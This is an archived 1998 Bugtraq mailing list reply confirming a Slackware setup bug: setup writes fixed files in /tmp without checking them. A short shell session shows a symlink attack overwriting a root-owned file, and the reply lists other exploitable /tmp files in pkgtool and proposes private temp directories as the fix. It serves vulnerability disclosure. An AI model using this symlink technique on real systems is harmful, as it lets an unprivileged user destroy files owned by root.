Bugtraq mailing list archives
Re: Security problem in Slackware.
From: peter () attic vuurwerk nl (Peter van Dijk)
Date: Fri, 13 Mar 1998 16:34:58 +0100
On Wed, 11 Mar 1998, Suman_Saraf wrote:
Hi, I just found out that the setup program in slackware creates a file called hdtest in /tmp without checking for its existence. So a malicious user could just create a symlink to any root owned file and it will get fucked up when the administrator runs setup. In my case I just created a symlink to /etc/passwd and when I exit the setup the file contains only "EXIT" :-) Lemme know if something has been done about it already.
I have Slackware 3.4 (the newest) and I've been following the ChangeLog on
ftp.cdrom.com. It only lists a fix for a bug I submitted (imapd/ipop3d
coredump).
[root@koek] /tmp# nd test
[root@koek] /tmp/test# echo "root owns this file" > rootfile
[root@koek] /tmp/test# cat rootfile
root owns this file
[root@koek] /tmp/test# ls -al rootfile
-rw-r--r-- 1 root root 20 Mar 13 16:21 rootfile
[peter@koek] /tmp$ ln -sf test/rootfile hdset
[root@koek] /tmp/test# setup
[peter@koek] /tmp$ ls -al test/rootfile
-rw-r--r-- 1 root root 4 Mar 13 16:23 test/rootfile
[peter@koek] /tmp$ cat test/rootfile
EXIT[peter@koek] /tmp$
So, it does still work.
Another thing that might be interesting are the /tmp/SeT* files.
setup creates them while running (starting with rm -f /tmp/Set*). But
while setup is running you should be able to create some symlinks, like
some kind of race. Only this time, you're racing a human ;)
Another file that can be exploited is /tmp/slackdir, which records which
directory should be the root of the slackware filesystem. Very unlikely to
be used, but worth noting.
pkgtool does things like this in:
/tmp/{reply,viewscr,return,tmpmsg,rmscript,wdrive,sets,pkgdir,mntans,tagfile,
skip}
and all kinds of /tmp/SeT* (which it cleans up when starting, like setup
does).
The best fix for this would be to let all these programs use their own
tmp-dir, because they're going to be run as root anyway.
Greetz, Peter.
------------------------------------------------------------------------------
'Selfishness and separation have led me to . Peter 'Hardbeat' van Dijk
to believe that the world is not my problem . network security consultant
I am the world. And you are the world.' . (yeah, right...)
Live - 10.000 years (peace is now) . peter () attic vuurwerk nl
------------------------------------------------------------------------------
4:19pm up 18:48, 4 users, load average: 0.00, 0.02, 0.00
------------------------------------------------------------------------------
Current thread:
- New OpenBSD security web page, (continued)
- New OpenBSD security web page Theo de Raadt (Mar 06)
- Re: the purpose of dynamic memory allocation tqbf () secnet com (Mar 06)
- Possible Bug in CDE on HP-UX gareth greenaway (Mar 09)
- Re: Possible Bug in CDE on HP-UX Jeremy Brinkley (Mar 10)
- Re: the purpose of dynamic memory allocation David LeBlanc (Mar 10)
- Re: the purpose of dynamic memory allocation Jeffrey Hutzelman (Mar 10)
- Re: the purpose of dynamic memory allocation Alan Cox (Mar 11)
- DoS (and possibly more) on MDaemon for NT/95 Alvaro Martinez Echevarria (Mar 10)
- MDaemon SMTP Server Buffer Overflow's Aleph One (Mar 10)
- Security problem in Slackware. Suman_Saraf (Mar 11)
- Re: Security problem in Slackware. Peter van Dijk (Mar 13)
- /tmp event logger Michal Zalewski (Mar 14)
- Re: /tmp event logger Theo de Raadt (Mar 15)
- Possible Bug in CDE on HP-UX gareth greenaway (Mar 09)
- Vunerable shell scripts Michal Zalewski (Mar 14)
- More broadcast fun T. Freak (Mar 14)
- Midnight Commander /tmp race Michal Zalewski (Mar 15)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 17)
- Re: Midnight Commander /tmp race willy () SNOWYOWL CSU AC RU (Mar 17)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 18)
- Solaris printd security vulnerability Aleph One (Mar 11)
- Sun Security Bulletin #00165 Aleph One (Mar 11)